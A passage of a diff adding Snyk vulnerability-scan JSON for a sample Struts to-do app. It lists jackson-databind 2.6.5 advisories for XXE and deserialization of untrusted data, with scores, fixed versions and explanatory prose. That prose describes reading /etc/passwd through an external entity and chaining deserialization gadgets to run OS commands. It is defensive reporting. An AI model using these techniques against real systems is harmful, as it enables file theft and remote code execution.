"functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ 